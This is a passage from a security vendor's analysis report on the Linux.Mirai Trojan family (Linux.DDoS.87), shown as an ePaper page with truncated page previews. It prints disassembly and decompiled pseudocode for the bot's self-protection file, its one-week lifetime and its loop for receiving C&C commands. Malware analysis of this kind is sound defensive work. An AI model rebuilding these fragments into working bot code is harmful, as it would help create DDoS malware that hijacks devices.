Investigation of Linux.Mirai Trojan family

More documents

Recommendations

Info

16 16 if(child3>0){ v28 = __GI___libc_open(".shinigami", O_CREAT, v30); if (v28 >= 0) close(v28); sleep(...) // one week kill(child3); exit(); } payload; The .shinigami file is created in the Trojan’s folder to protect the Trojan from removing itself. The maximum uptime of Linux.DDoS.87 on an infected computer is one week, after which the Trojan terminates its operation. The cycle for receiving and executing commands After that, the malicious process tries to connect to the C&C server to get instructions: .text:0804B44E call ___libc_fork .text:0804B453 mov ebx, eax .text:0804B455 test eax, eax .text:0804B457 jg loc_804B84E .text:0804B45D call ___GI_setsid .text:0804B462 sub esp, 0Ch .text:0804B465 push 0 ; fd .text:0804B467 call ___libc_close .text:0804B46C mov dword ptr [esp+0], 1 ; fd .text:0804B473 call ___libc_close .text:0804B478 mov dword ptr [esp+0], 2 ; fd .text:0804B47F call ___libc_close .text:0804B484 add esp, 10h .text:0804B487 lea eax, [edi+2] .text:0804B48A xor esi, esi .text:0804B48C mov [esp+48Ch+ptr_to_third_comm_byte], eax .text:0804B490 entry_point_of_payload_execution: +167j ; CODE XREF: main .text:0804B490 ; main+17Aj ... .text:0804B490 mov edx, esi .text:0804B492 mov eax, 1000h .text:0804B497 and edx, 0FFFFh .text:0804B49D push 4000h ; int .text:0804B4A2 sub eax, edx
17 17 .text:0804B4A4 push eax ; int .text:0804B4A5 lea edx, [edi+edx] .text:0804B4A8 mov eax, ds:fd .text:0804B4AD push edx ; char * .text:0804B4AE push eax ; int .text:0804B4AF call ___libc_recv .text:0804B4B4 add esp, 10h .text:0804B4B7 test eax, eax .text:0804B4B9 jle recv_failed .text:0804B4BF add esi, eax .text:0804B4C1 cmp si, 1 .text:0804B4C5 ja short recv_ok .text:0804B4C7 jmp short entry_point_of_payload_execution If recv returns an error, a socket is opened, and its content is recorded to the fd global variable: .text:0804B553 recv_failed: ; CODE XREF: main +159j .text:0804B553 mov eax, ds:fd .text:0804B558 test eax, eax .text:0804B55A js short fd_closed_or_uninitialized .text:0804B55C sub esp, 0Ch .text:0804B55F push eax ; fd .text:0804B560 call ___libc_close .text:0804B565 add esp, 10h .text:0804B568 .text:0804B568 fd_closed_or_uninitialized: ; CODE XREF: main +1FAj .text:0804B568 push eax .text:0804B569 push 0 .text:0804B56B push 1 .text:0804B56D push 2 .text:0804B56F call ___GI_socket .text:0804B574 add esp, 10h .text:0804B577 mov ds:fd, eax During reading/writing, a minute-long time-out is set: socket_timeout.tv_sec = 60; socket_timeout.tv_usec = 0; __GI_setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &socket_timeout, 8); __GI_setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &socket_timeout, 8);
Page 1 and 2: Investigation of Linux.Mirai Trojan
Page 3 and 4: 3 3 Introduction A Trojan for Linux
Page 5 and 6: 5 5 v1[1] = XX; v1[2] = XX; v1[3] =
Page 7 and 8: 7 7 Number Data type Value Purpose
Page 9 and 10: 9 9 .text:08048206 mov ds:Q[ecx*4],
Page 11 and 12: 11 11 .text:0804B03C mov dword ptr
Page 13 and 14: 13 13 .text:0804B1FB push 0 ; flags
Page 15: 15 15 .text:0804B3C1 call ___libc_w
Page 19 and 20: 19 19 .text:0804B674 push offset a2
Page 21 and 22: 21 21 .text:0804B529 push 4000h ; i
Page 23 and 24: 23 23 } char * data; Code to initia
Page 25 and 26: 25 25 .text:0804BB16 test bl, bl .t
Page 27 and 28: 27 27 setsid(); sleep(time); kill(v
Page 29 and 30: 29 29 The getNumberOrDefault functi
Page 31 and 32: 31 31 v9 = __ROR2__(sport, 8); curr
Page 33 and 34: 33 33 .text:0804AD5E add esp, 18h .
Page 35 and 36: 35 35 .text:0804A50F xor ecx, ecx .
Page 37 and 38: 37 37 In addition, TCP parameters w
Page 39 and 40: 39 39 .text:08048F6D mov eax, [esp+
Page 41 and 42: 41 41 Linux.DDoS.89 SHA1: 846b2d1b0
Page 43 and 44: 43 43 } } else { v8 = 0; while ( ++
Page 45 and 46: 45 45 { } decode(4u); decode(5u); c
Page 47 and 48: 47 47 } else { result = __GI_listen
Page 49 and 50: 49 49 Number Decrypted value Purpos
Page 51 and 52: 51 51 .text:0804C218 push 9 ; sig .
Page 53 and 54: 53 53 Number Value Purpose 16 "zoll
Page 55 and 56: 55 55 Next, the Trojan calculates a

Investigation of Linux.Mirai Trojan family

Create successful ePaper yourself

Delete template?

Save as template?